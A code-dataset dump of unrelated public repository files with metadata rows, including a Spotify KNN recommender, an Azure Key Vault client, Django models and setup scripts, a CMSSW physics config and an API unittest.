raw_recommends = data_id.iloc[indices[0][1:],]
result = raw_recommends
return result, distances, indices
def split_numerical_id(track_data):
# Extract the numerical features only, for KNN analysis
data_numerical = track_data[['acousticness','danceability','energy','instrumentalness','key','liveness','loudness','mode','speechiness','tempo','valence','time_signature']]
# Extract the identidy data only, for outputs
data_id = track_data[['album_name','album_uri','artist_name','artist_uri','track_name','track_uri']]
return data_numerical, data_id
def get_knn_recommend(model_knn, seed_id, data_id, data_knn_scale, num_neighbor):
# Predict using KNN
seed_num = data_id[data_id.track_uri == seed_id].index[0]
seed_vector = data_knn_scale[seed_num].reshape(1, -1)
# Predict recommendation using KNN
result, distance, indices = knn_rank(model_knn, seed_vector, data_id, data_knn_scale, num_neighbor)
return result, distance
def knn_run(seed_id, num_neighbor):
# Read Data and drop duplicated track_uris
total_data = pd.read_csv('data_sample.csv').drop_duplicates('track_uri').reset_index(drop = True)
# split the input data into numerical features and identity features
data_numerical, data_id = split_numerical_id(total_data)
# scale and normalize the data
data_knn_scale = scale_norm(data_numerical)
data_id = data_id.reset_index(drop = True)
# print(data_knn_scale.shape)
# print(data_id.shape)
print('Input Seed:', data_id[data_id['track_uri']==seed_id][['artist_name', 'track_name']])
# Model Training
model_knn = NearestNeighbors(metric='cosine', algorithm='brute', n_neighbors=num_neighbor, n_jobs=-1)
model_knn.fit(data_knn_scale)
# Model Predicting
result, distance = get_knn_recommend(model_knn, seed_id, data_id, data_knn_scale, num_neighbor)
result = result.reset_index(drop=True)
score = pd.DataFrame(1 - distance).T[1:].reset_index(drop=True)
output = pd.concat([result, score], axis =1).rename(columns={0:'score'})
return output
if __name__ == '__main__':
# Sample seed track_uri
seed_id = '6dr6QeqH62tYUiPezRbinq'
# Specify the number of neighbors for output
num_neighbor = 100
output = knn_run(seed_id, num_neighbor)
| [
"noreply@github.com"
] | Hadryan.noreply@github.com |
251fb0fe7b9ce2897c4ea970c74c6afc7d9ca55a | f4434c85e3814b6347f8f8099c081ed4af5678a5 | /sdk/keyvault/azure-mgmt-keyvault/azure/mgmt/keyvault/aio/_key_vault_management_client.py | a967aa9463c857d292acf0bcdbc7f3d4774fa1e4 | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] | permissive | yunhaoling/azure-sdk-for-python | 5da12a174a37672ac6ed8e3c1f863cb77010a506 | c4eb0ca1aadb76ad892114230473034830116362 | refs/heads/master | 2022-06-11T01:17:39.636461 | 2020-12-08T17:42:08 | 2020-12-08T17:42:08 | 177,675,796 | 1 | 0 | MIT | 2020-03-31T20:35:17 | 2019-03-25T22:43:40 | Python | UTF-8 | Python | false | false | 11,175 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from azure.mgmt.core import AsyncARMPipelineClient
from msrest import Serializer, Deserializer
from azure.profiles import KnownProfiles, ProfileDefinition
from azure.profiles.multiapiclient import MultiApiClientMixin
from ._configuration import KeyVaultManagementClientConfiguration
class _SDKClient(object):
def __init__(self, *args, **kwargs):
"""This is a fake class to support current implemetation of MultiApiClientMixin."
Will be removed in final version of multiapi azure-core based client
"""
pass
class KeyVaultManagementClient(MultiApiClientMixin, _SDKClient):
"""The Azure management API provides a RESTful set of web services that interact with Azure Key Vault.
This ready contains multiple API versions, to help you deal with all of the Azure clouds
(Azure Stack, Azure Government, Azure China, etc.).
By default, it uses the latest API version available on public Azure.
For production, you should stick to a particular api-version and/or profile.
The profile sets a mapping between an operation group and its API version.
The api-version parameter sets the default API version if the operation
group is not described in the profile.
:param credential: Credential needed for the client to connect to Azure.
:type credential: ~azure.core.credentials_async.AsyncTokenCredential
:param subscription_id: Subscription credentials which uniquely identify Microsoft Azure subscription. The subscription ID forms part of the URI for every service call.
:type subscription_id: str
:param str api_version: API version to use if no profile is provided, or if
missing in profile.
:param str base_url: Service URL
:param profile: A profile definition, from KnownProfiles to dict.
:type profile: azure.profiles.KnownProfiles
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
"""
DEFAULT_API_VERSION = '2019-09-01'
_PROFILE_TAG = "azure.mgmt.keyvault.KeyVaultManagementClient"
LATEST_PROFILE = ProfileDefinition({
_PROFILE_TAG: {
None: DEFAULT_API_VERSION,
}},
_PROFILE_TAG + " latest"
)
def __init__(
self,
credential, # type: "AsyncTokenCredential"
subscription_id, # type: str
api_version=None,
base_url=None,
profile=KnownProfiles.default,
**kwargs # type: Any
) -> None:
if not base_url:
base_url = 'https://management.azure.com'
self._config = KeyVaultManagementClientConfiguration(credential, subscription_id, **kwargs)
self._client = AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs)
super(KeyVaultManagementClient, self).__init__(
api_version=api_version,
profile=profile
)
@classmethod
def _models_dict(cls, api_version):
return {k: v for k, v in cls.models(api_version).__dict__.items() if isinstance(v, type)}
@classmethod
def models(cls, api_version=DEFAULT_API_VERSION):
"""Module depends on the API version:
* 2016-10-01: :mod:`v2016_10_01.models<azure.mgmt.keyvault.v2016_10_01.models>`
* 2018-02-14: :mod:`v2018_02_14.models<azure.mgmt.keyvault.v2018_02_14.models>`
* 2019-09-01: :mod:`v2019_09_01.models<azure.mgmt.keyvault.v2019_09_01.models>`
* 2020-04-01-preview: :mod:`v2020_04_01_preview.models<azure.mgmt.keyvault.v2020_04_01_preview.models>`
"""
if api_version == '2016-10-01':
from ..v2016_10_01 import models
return models
elif api_version == '2018-02-14':
from ..v2018_02_14 import models
return models
elif api_version == '2019-09-01':
from ..v2019_09_01 import models
return models
elif api_version == '2020-04-01-preview':
from ..v2020_04_01_preview import models
return models
raise ValueError("API version {} is not available".format(api_version))
@property
def managed_hsms(self):
"""Instance depends on the API version:
* 2020-04-01-preview: :class:`ManagedHsmsOperations<azure.mgmt.keyvault.v2020_04_01_preview.aio.operations.ManagedHsmsOperations>`
"""
api_version = self._get_api_version('managed_hsms')
if api_version == '2020-04-01-preview':
from ..v2020_04_01_preview.aio.operations import ManagedHsmsOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'managed_hsms'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def operations(self):
"""Instance depends on the API version:
* 2016-10-01: :class:`Operations<azure.mgmt.keyvault.v2016_10_01.aio.operations.Operations>`
* 2018-02-14: :class:`Operations<azure.mgmt.keyvault.v2018_02_14.aio.operations.Operations>`
* 2019-09-01: :class:`Operations<azure.mgmt.keyvault.v2019_09_01.aio.operations.Operations>`
* 2020-04-01-preview: :class:`Operations<azure.mgmt.keyvault.v2020_04_01_preview.aio.operations.Operations>`
"""
api_version = self._get_api_version('operations')
if api_version == '2016-10-01':
from ..v2016_10_01.aio.operations import Operations as OperationClass
elif api_version == '2018-02-14':
from ..v2018_02_14.aio.operations import Operations as OperationClass
elif api_version == '2019-09-01':
from ..v2019_09_01.aio.operations import Operations as OperationClass
elif api_version == '2020-04-01-preview':
from ..v2020_04_01_preview.aio.operations import Operations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'operations'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def private_endpoint_connections(self):
"""Instance depends on the API version:
* 2018-02-14: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.keyvault.v2018_02_14.aio.operations.PrivateEndpointConnectionsOperations>`
* 2019-09-01: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.keyvault.v2019_09_01.aio.operations.PrivateEndpointConnectionsOperations>`
* 2020-04-01-preview: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.keyvault.v2020_04_01_preview.aio.operations.PrivateEndpointConnectionsOperations>`
"""
api_version = self._get_api_version('private_endpoint_connections')
if api_version == '2018-02-14':
from ..v2018_02_14.aio.operations import PrivateEndpointConnectionsOperations as OperationClass
elif api_version == '2019-09-01':
from ..v2019_09_01.aio.operations import PrivateEndpointConnectionsOperations as OperationClass
elif api_version == '2020-04-01-preview':
from ..v2020_04_01_preview.aio.operations import PrivateEndpointConnectionsOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'private_endpoint_connections'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def private_link_resources(self):
"""Instance depends on the API version:
* 2018-02-14: :class:`PrivateLinkResourcesOperations<azure.mgmt.keyvault.v2018_02_14.aio.operations.PrivateLinkResourcesOperations>`
* 2019-09-01: :class:`PrivateLinkResourcesOperations<azure.mgmt.keyvault.v2019_09_01.aio.operations.PrivateLinkResourcesOperations>`
* 2020-04-01-preview: :class:`PrivateLinkResourcesOperations<azure.mgmt.keyvault.v2020_04_01_preview.aio.operations.PrivateLinkResourcesOperations>`
"""
api_version = self._get_api_version('private_link_resources')
if api_version == '2018-02-14':
from ..v2018_02_14.aio.operations import PrivateLinkResourcesOperations as OperationClass
elif api_version == '2019-09-01':
from ..v2019_09_01.aio.operations import PrivateLinkResourcesOperations as OperationClass
elif api_version == '2020-04-01-preview':
from ..v2020_04_01_preview.aio.operations import PrivateLinkResourcesOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'private_link_resources'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def vaults(self):
"""Instance depends on the API version:
* 2016-10-01: :class:`VaultsOperations<azure.mgmt.keyvault.v2016_10_01.aio.operations.VaultsOperations>`
* 2018-02-14: :class:`VaultsOperations<azure.mgmt.keyvault.v2018_02_14.aio.operations.VaultsOperations>`
* 2019-09-01: :class:`VaultsOperations<azure.mgmt.keyvault.v2019_09_01.aio.operations.VaultsOperations>`
* 2020-04-01-preview: :class:`VaultsOperations<azure.mgmt.keyvault.v2020_04_01_preview.aio.operations.VaultsOperations>`
"""
api_version = self._get_api_version('vaults')
if api_version == '2016-10-01':
from ..v2016_10_01.aio.operations import VaultsOperations as OperationClass
elif api_version == '2018-02-14':
from ..v2018_02_14.aio.operations import VaultsOperations as OperationClass
elif api_version == '2019-09-01':
from ..v2019_09_01.aio.operations import VaultsOperations as OperationClass
elif api_version == '2020-04-01-preview':
from ..v2020_04_01_preview.aio.operations import VaultsOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'vaults'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
async def close(self):
await self._client.close()
async def __aenter__(self):
await self._client.__aenter__()
return self
async def __aexit__(self, *exc_details):
await self._client.__aexit__(*exc_details)
| [
"noreply@github.com"
] | yunhaoling.noreply@github.com |
5d53f9a863c1badebd9528387de602d7b9308982 | 633944f913050debf0764c2a29cf3e88f912670e | /v8/depot_tools/bootstrap-3.8.0b1.chromium.1_bin/python3/lib/python3.8/site-packages/pip/_vendor/packaging/_structures.py | a442ded53a74bb7ab3cfba52fff2e34073d3ae1c | [
"BSD-3-Clause",
"bzip2-1.0.6",
"SunPro",
"Apache-2.0"
] | permissive | bopopescu/V8-lgtm | 0474c2ff39baf754f556ef57619ceae93e7320fd | da307e2f7abfca5fa0e860a809de6cd07fd1b72b | refs/heads/master | 2022-02-16T19:10:54.008520 | 2019-09-25T07:51:13 | 2019-09-25T07:51:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 107 | py | ../../../../../../../.cipd/pkgs/2/_current/lib/python3.8/site-packages/pip/_vendor/packaging/_structures.py | [
"jundong.xjd@antfin.com"
] | jundong.xjd@antfin.com |
49eba96374a4a38078f28ee469f2bb8d525d67ea | 14e7058adf766352a0b90b66b7dcf887105a481c | /portal/messages/models.py | c11765e46bf0cd904a86461b20cf043a9c9591c9 | [
"BSD-2-Clause"
] | permissive | brunogamacatao/portalsaladeaula | 2b7f07f07c2518dd359f043483fbb27417f62aaf | 9429e485aa37ffea3208339a807032e9230a3c84 | refs/heads/master | 2020-12-29T01:42:18.594281 | 2012-06-22T12:24:44 | 2012-06-22T12:24:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,882 | py | # -*- coding: utf-8 -*-
from operator import attrgetter
__author__ = 'brunocatao'
import datetime
import logging
from django.db import models
from django.contrib.contenttypes import generic
from django.contrib.contenttypes.models import ContentType
from django.utils.encoding import force_unicode
from django.utils.translation import ugettext as _
from django.contrib.auth.models import User
from django.template import Context
from django.template.loader import get_template
from django.core.mail import EmailMultiAlternatives
from portal.models import UserInfo
class MessageManager(models.Manager):
def for_model(self, model):
"""
QuerySet for all updates for a particular model (either an instance or a class).
"""
ct = ContentType.objects.get_for_model(model)
qs = self.get_query_set().filter(content_type=ct)
if isinstance(model, models.Model):
qs = qs.filter(object_pk=force_unicode(model._get_pk_val()))
return qs
def get_replies(self, user):
qs = self.get_query_set().filter(author=user, is_reply=False)
messages = [msg for msg in list(qs.all()) if msg.replies.count() > 0]
return sorted(messages, key=attrgetter('earlier_date'), reverse=True)
class Message(models.Model):
subject = models.CharField(blank=False, max_length=100)
text = models.TextField(blank=False)
date_published = models.DateTimeField(default=datetime.datetime.now)
author = models.ForeignKey(User, blank=False)
is_reply = models.NullBooleanField(blank=True, null=True)
content_type = models.ForeignKey(ContentType, verbose_name=_('content type'), related_name="content_type_set_for_%(class)s")
object_pk = models.CharField(_('object ID'), max_length=100)
content_object = generic.GenericForeignKey(ct_field="content_type", fk_field="object_pk")
objects = MessageManager()
def get_earlier_date(self):
earlier_date = self.date_published
if self.replies:
for reply in self.replies.all():
if reply.child.date_published > earlier_date:
earlier_date = reply.child.date_published
return earlier_date
earlier_date = property(get_earlier_date)
def fill_date_published(sender, instance, **kw):
if not instance.date_published:
instance.date_published = datetime.datetime.now()
models.signals.pre_save.connect(fill_date_published, sender=Message)
def invalidate_cache(sender, instance, **kw):
target = instance.content_type.get_object_for_this_type(pk=instance.object_pk)
target.messages_cache = None
target.save()
models.signals.pre_save.connect(invalidate_cache, sender=Message)
class ReplyRelationship(models.Model):
parent = models.ForeignKey(Message, related_name="replies")
child = models.ForeignKey(Message, related_name="parent")
#Signal processing
import traceback
from portal.messages.signals import massage_was_posted
def message_notification(sender, **kwargs):
message = kwargs['message']
target = message.content_type.get_object_for_this_type(pk=message.object_pk)
text = u'%s postou, %s:' % (message.author.get_profile().name, message.subject, )
text += '\n%s' % message.text
ctx = {
'mensagem': text,
'link': 'http://www.portalsaladeaula.com%s' % target.get_absolute_url(),
}
subject = message.subject
from_email = 'Portal Sala de Aula <gerencia@portalsaladeaula.com>'
text_content = get_template('emails/update.txt').render(Context(ctx))
html_content = get_template('emails/update.html').render(Context(ctx))
if isinstance(target, UserInfo) :
mail_to.append(target.email)
else:
if target.get_students():
for student in target.get_students():
msg = EmailMultiAlternatives(subject, text_content, from_email, [student.email, ])
msg.attach_alternative(html_content, "text/html")
try:
msg.send()
except:
logging.error('Não foi possível enviar o email')
traceback.print_exc()
if target.get_teachers():
for teacher in target.get_teachers():
msg = EmailMultiAlternatives(subject, text_content, from_email, [teacher.email, ])
msg.attach_alternative(html_content, "text/html")
try:
msg.send()
except:
logging.error('Não foi possível enviar o email')
traceback.print_exc()
massage_was_posted.connect(message_notification)
class Attachment(models.Model):
file = models.FileField(_('Attachment'), blank=False, upload_to='uploads/%Y/%m/%d/%H/%M/%S/')
message = models.ForeignKey(Message, blank=True, null=True) | [
"brunogamacatao@gmail.com"
] | brunogamacatao@gmail.com |
0ef8d8053b594333cebb10fcf5499c6eaa0f4561 | 3a1a9e085da569c8cfd01752a46d499d407f55b7 | /phonesite/manage.py | 1db558fe9844c8bad39ef4149384fbc0e7b74710 | [] | no_license | gzgdouru/django | 9286f2480be029a37f1ca8c8b400c21f7250e64b | e55ea1a3e424da7621ec799759a6d5b346a95bb0 | refs/heads/master | 2020-03-19T13:48:49.830094 | 2018-08-29T01:51:41 | 2018-08-29T01:51:41 | 136,596,209 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 807 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "phonesite.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
| [
"18719091650@163.com"
] | 18719091650@163.com |
e38cc17d71bc92be9695f5c69c0a8dd781ea878d | 4ed3db861ae2fe727c7be604d42d540a00923320 | /samsung_multiroom/__init__.py | f5eaa8a8e92a00784ea09bf85a26da5fad2d46e8 | [
"MIT"
] | permissive | kusma/samsung_multiroom | 7cac147283a52bf491d7f50a6569c64de53eb4a5 | 09ca86d27b87a4aa0c97ec2accbd4ec67dd0cc61 | refs/heads/master | 2020-12-04T07:46:19.688568 | 2019-04-20T16:29:44 | 2019-04-20T16:29:44 | 231,683,383 | 0 | 0 | MIT | 2020-01-03T23:47:29 | 2020-01-03T23:47:28 | null | UTF-8 | Python | false | false | 254 | py | """
Init.
"""
# pylint: disable=C0103
from . import factory
from . import discovery
from .service import REPEAT_ONE, REPEAT_ALL, REPEAT_OFF
# aliases
SamsungMultiroomSpeaker = factory.speaker_factory
SamsungSpeakerDiscovery = discovery.SpeakerDiscovery
| [
"k.galutowski@gmail.com"
] | k.galutowski@gmail.com |
1952570b90f1800528a3b78b0f70da2e1c2b2478 | a8be4698c0a43edc3622837fbe2a98e92680f48a | /Programmers/Hash/위장.py | 7916695309725c283e78994ea36da5b2f1786f25 | [] | no_license | blueboy1593/algorithm | fa8064241f7738a12b33544413c299e7c1e1a908 | 9d6fdd82b711ba16ad613edcc041cbecadd85e2d | refs/heads/master | 2021-06-23T22:44:06.120932 | 2021-02-21T10:44:16 | 2021-02-21T10:44:16 | 199,543,744 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 463 | py | from collections import defaultdict
def solution(clothes):
answer = 1
clothes_dict = defaultdict(list)
for cloth in clothes:
a, b = cloth
clothes_dict[b].append(a)
arr = []
for value in clothes_dict.values():
arr.append(len(value))
for ar in arr:
answer *= ar + 1
answer -= 1
return answer
solution([['yellow_hat', 'headgear'], ['blue_sunglasses', 'eyewear'], ['green_turban', 'headgear']]) | [
"snb0303@naver.com"
] | snb0303@naver.com |
f278e0b8a688262bf51f4581909942235236acfe | 116fa33c52c561b86cee2a43c6f3d18ff6496df5 | /setup.py | fba9817d3fbe164062eb48fff629060326c8b584 | [
"Apache-2.0"
] | permissive | famousthom/overseer | fc3c276a9b53c3fa56ab30fbf35341177f1e1a43 | 69e7a229450c4eed8721e5cfce6a98c708b50a95 | refs/heads/master | 2020-12-24T17:53:43.633263 | 2011-06-04T17:59:40 | 2011-06-04T17:59:40 | 1,847,508 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,152 | py | #!/usr/bin/env python
try:
from setuptools import setup, find_packages
from setuptools.command.test import test
except ImportError:
from ez_setup import use_setuptools
use_setuptools()
from setuptools import setup, find_packages
from setuptools.command.test import test
class mytest(test):
def run(self, *args, **kwargs):
from runtests import runtests
runtests()
setup(
name='Overseer',
version='0.2.2',
author='DISQUS',
author_email='opensource@disqus.com',
url='http://github.com/disqus/overseer',
description = 'A status board built with Django',
packages=find_packages(),
zip_safe=False,
install_requires=[
'Django>=1.2.4',
'South',
'django-devserver',
'oauth2>=1.5.169',
'uuid',
],
test_suite = 'overseer.tests',
include_package_data=True,
cmdclass={"test": mytest},
classifiers=[
'Framework :: Django',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'Operating System :: OS Independent',
'Topic :: Software Development'
],
) | [
"dcramer@gmail.com"
] | dcramer@gmail.com |
4e035dbd22d936b9cb74cb2496fab16767ca84fd | 35c73e0b545f6ceb791994db6e6c8ce3624885b9 | /config/deprecated_211014/cmssw_privateMC_TagAndProbe_Bp_MuNuDstst.py | 2ee8082fbc51311a1df9a56ce480e891b62ca128 | [] | no_license | ocerri/BPH_RDntuplizer | edb26d466352b831e53d6f18d6d1980074686c9b | a4b157f5a64473bf3db360019d55fa2217199015 | refs/heads/master | 2022-06-27T06:33:32.566956 | 2022-06-09T01:59:46 | 2022-06-09T01:59:46 | 167,600,038 | 2 | 6 | null | 2022-06-03T02:04:49 | 2019-01-25T19:14:04 | C++ | UTF-8 | Python | false | false | 4,742 | py | import os, sys
import FWCore.ParameterSet.Config as cms
import FWCore.ParameterSet.VarParsing as VarParsing
from Configuration.StandardSequences.Eras import eras
process = cms.Process('BPHRDntuplizer', eras.Run2_2018)
# import of standard configurations
process.load('FWCore.MessageService.MessageLogger_cfi')
# Needed for transient track builder
# process.load('Configuration.StandardSequences.Services_cff')
# process.load('Configuration.EventContent.EventContent_cff')
process.load("TrackingTools/TransientTrack/TransientTrackBuilder_cfi")
process.load('Configuration.StandardSequences.GeometryRecoDB_cff')
process.load('Configuration.StandardSequences.MagneticField_cff')
# process.load('Configuration.StandardSequences.EndOfProcess_cff')
process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')
from Configuration.AlCa.GlobalTag import GlobalTag
process.GlobalTag = GlobalTag(process.GlobalTag, '102X_upgrade2018_realistic_v12', '')
'''
############ Command line args ################
'''
args = VarParsing.VarParsing('analysis')
args.register('inputFile', '', args.multiplicity.list, args.varType.string, "Input file or template for glob")
args.outputFile = ''
args.parseArguments()
'''
##################### Input ###################
'''
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(args.maxEvents)
)
from glob import glob
if args.inputFile:
if len(args.inputFile) == 1 and '*' in args.inputFile[0]:
flist = glob(args.inputFile[0])
else:
flist = args.inputFile
elif args.inputFiles:
if len(args.inputFiles) == 1 and args.inputFiles[0].endswith('.txt'):
with open(args.inputFiles[0]) as f:
flist = [l[:-1] for l in f.readlines()]
else:
flist = args.inputFiles
else:
fdefault = os.environ['CMSSW_BASE'] + '/src/ntuplizer/BPH_RDntuplizer/production/'
fdefault += 'inputFiles_BP_Tag_Bp_MuNuDstst_Hardbbbar_evtgen_ISGW2_PUc0_10-2-3.txt'
with open(fdefault) as f:
flist = [l[:-1] for l in f.readlines()]
flist = flist[:20]
for i in range(len(flist)):
if os.path.isfile(flist[i]):
flist[i] = 'file:' + flist[i]
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring(tuple(flist)),
inputCommands=cms.untracked.vstring('keep *',
'drop GenLumiInfoHeader_generator__SIM'),
skipBadFiles=cms.untracked.bool(True)
)
process.source.duplicateCheckMode = cms.untracked.string('noDuplicateCheck')
'''
##################### Output ###################
'''
if args.outputFile == '.root':
outname = 'TagAndProbe_Bp2MuNuDstst_Pip_CAND.root'
elif args.outputFile.startswith('_numEvent'):
outname = 'TagAndProbe_Bp2MuNuDstst_Pip_CAND' + args.outputFile
else:
outname = args.outputFile
process.TFileService = cms.Service("TFileService",
fileName = cms.string(outname),
closeFileFast = cms.untracked.bool(True)
)
'''
################# Sequence ####################
'''
process.trgF = cms.EDFilter("TriggerMuonsFilter",
muon_charge = cms.int32(1),
verbose = cms.int32(0)
)
process.B2MuDstDT = cms.EDProducer("TagAndProbeBp2DststMuProducer",
trgMuons = cms.InputTag("trgF","trgMuonsMatched", ""),
charge_muon = cms.int32(+1),
charge_K = cms.int32(+1),
charge_pi = cms.int32(-1),
charge_pip = cms.int32(+1),
verbose = cms.int32(0)
)
process.B2MuDstDTFilter = cms.EDFilter("B2DstMuDecayTreeFilter",
verbose = cms.int32(0)
)
cfg_name = os.path.basename(sys.argv[0])
f = open(os.environ['CMSSW_BASE']+'/src/ntuplizer/BPH_RDntuplizer/.git/logs/HEAD')
commit_hash = f.readlines()[-1][:-1].split(' ')[1]
process.outA = cms.EDAnalyzer("FlatTreeWriter",
cmssw = cms.string(os.environ['CMSSW_VERSION']),
cfg_name = cms.string(cfg_name),
commit_hash = cms.string(commit_hash),
verbose = cms.int32(0)
)
process.p = cms.Path(
process.trgF +
process.B2MuDstDT +
process.B2MuDstDTFilter+
process.outA
)
# DEBUG -- dump the event content
# process.output = cms.OutputModule(
# "PoolOutputModule",
# fileName = cms.untracked.string('edm_output.root'),
# )
# process.output_step = cms.EndPath(process.output)
#
# process.schedule = cms.Schedule(
# process.p,
# process.output_step)
'''
############# Overall settings ################
'''
process.MessageLogger.cerr.FwkReport.reportEvery = 100
| [
"olmo.cerri@gmail.com"
] | olmo.cerri@gmail.com |
227c7a0d62baf387c75ed7a38cd0abc217cc728d | 84156ccfb34bd133b4e050e07c165ffe4030c39e | /avocado/export/__init__.py | 7fd0c7ab061c1daa38661335d8e5e48817284ed1 | [
"BSD-3-Clause"
] | permissive | leipzig/avocado | ae4482585683585dd41e9e2ecd2d0e12e649aaa7 | 930bc77371d609e05691508e544e5d97a090cfd8 | refs/heads/master | 2021-01-16T19:59:05.140028 | 2012-12-15T01:49:38 | 2012-12-15T01:49:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 608 | py | from avocado.core import loader
from avocado.conf import OPTIONAL_DEPS
from _csv import CSVExporter
from _sas import SasExporter
from _r import RExporter
from _json import JSONExporter
from _html import HTMLExporter
registry = loader.Registry(register_instance=False)
registry.register(CSVExporter, 'csv')
registry.register(SasExporter, 'sas')
registry.register(RExporter, 'r')
registry.register(JSONExporter, 'json')
registry.register(HTMLExporter, 'html')
if OPTIONAL_DEPS['openpyxl']:
from _excel import ExcelExporter
registry.register(ExcelExporter, 'excel')
loader.autodiscover('exporters')
| [
"b@devel.io"
] | b@devel.io |
d1fd9a40ca971617b4b8d46e1f4c0b85a476400f | a977365234cad283d9f3edc022976a70501c1c41 | /API-Auto/testCase/PersonalCenter/test5_03case.py | 3052a24d526bd1176eceaa495014da24de0a2e2f | [] | no_license | quqiao/hezongyy | 849f2b9c8a4db562bde5e415ef012ff29c704fd8 | cde6805ada979afe0b24911f8c5d0977cfd92e5a | refs/heads/master | 2021-08-16T10:20:12.618268 | 2020-07-23T09:09:07 | 2020-07-23T09:09:07 | 205,772,625 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,702 | py | import json
import unittest
from common1.configHttp import RunMain
import paramunittest
import geturlParams
import urllib.parse
# import pythoncom
import readExcel
from SaveParam.GetParam import UserLoginToken
from testCase.user import test1_01case
# pythoncom.CoInitialize()
import time
time.sleep(3)
# url = geturlParams.geturlParams().get_Url2_1() # 调用我们的geturlParams获取我们拼接的URL
login_xls = readExcel.readExcel().get_xls('个人中心.xlsx', '3我的收藏商品')
@paramunittest.parametrized(*login_xls)
class testSettleAddGoodsCart(unittest.TestCase):
def setParameters(self, case_name, url, port, path, query, method, expected, result):
"""
set params
:param case_name:
:param path
:param query
:param method
:return:
"""
self.case_name = str(case_name)
self.url = str(url)
self.port = str(int(port))
self.path = str(path)
self.query = str(query)
self.method = str(method)
self.expected = str(expected)
self.result = str(result)
def description(self):
"""
test report description
:return:
"""
self.case_name
def setUp(self):
"""
:return:
"""
print("执行用例:" + self.case_name)
def test2_04case(self):
"""3我的收藏商品接口"""
self.checkResult()
def tearDown(self):
print("测试结束,输出log完结\n\n")
def checkResult(self): # 断言
"""
check test result
:return:
"""
# url1 = "http://www.xxx.com/login?"
# new_url = url1 + self.query
# data1 = dict(urllib.parse.parse_qsl(urllib.parse.urlsplit(new_url).query)) # 将一个完整的URL中的name=&pwd=转换为{'name':'xxx','pwd':'bbb'}
data1 = self.query.encode('utf-8')
# hearder = {"hesytoken": "32fcb1ca-a6d7-11ea-858f-0a0027000008"}
hearder = {"hesytoken": UserLoginToken()}
url = 'http://' + self.url + ':' + self.port + self.path
info = RunMain().run_main(self.method, url, data1, hearder) # 根据Excel中的method调用run_main来进行requests请求,并拿到响应
ss = json.loads(info) # 将响应转换为字典格式
if self.case_name == 'userId正确': # 如果case_name是login,说明合法,返回的code应该为200
self.assertEqual(ss['code'], '000000')
if self.case_name == 'userId错误': # 同上
self.assertEqual(ss['code'], "000000")
if self.case_name == 'userId为空': # 同上
self.assertEqual(ss['code'], "000000")
if self.case_name == 'barndId正确': # 如果case_name是login,说明合法,返回的code应该为200
self.assertEqual(ss['code'], '000000')
if self.case_name == 'barndId错误': # 同上
self.assertEqual(ss['code'], "000000")
if self.case_name == 'barndId为空': # 同上
self.assertEqual(ss['code'], "000000")
if self.case_name == 'id正确': # 如果case_name是login,说明合法,返回的code应该为200
self.assertEqual(ss['code'], '000000')
if self.case_name == 'id错误': # 同上
self.assertEqual(ss['code'], "000000")
if self.case_name == 'id为空': # 同上
self.assertEqual(ss['code'], "000000")
if self.case_name == 'vip正确': # 如果case_name是login,说明合法,返回的code应该为200
self.assertEqual(ss['code'], '000000')
if self.case_name == 'vip错误': # 同上
self.assertEqual(ss['code'], "000000")
if self.case_name == 'vip为空': # 同上
self.assertEqual(ss['code'], "000000")
if self.case_name == 'limitSize正确': # 如果case_name是login,说明合法,返回的code应该为200
self.assertEqual(ss['code'], '000000')
if self.case_name == 'limitSize错误': # 同上
self.assertEqual(ss['code'], "000000")
if self.case_name == 'limitSize为空': # 同上
self.assertEqual(ss['code'], "000000")
if self.case_name == 'limitStart正确': # 如果case_name是login,说明合法,返回的code应该为200
self.assertEqual(ss['code'], '000000')
if self.case_name == 'limitStart错误': # 同上
self.assertEqual(ss['code'], "000000")
if self.case_name == 'limitStart为空': # 同上
self.assertEqual(ss['code'], "000000")
if self.case_name == 'goodsIdList正确': # 如果case_name是login,说明合法,返回的code应该为200
self.assertEqual(ss['code'], '000000')
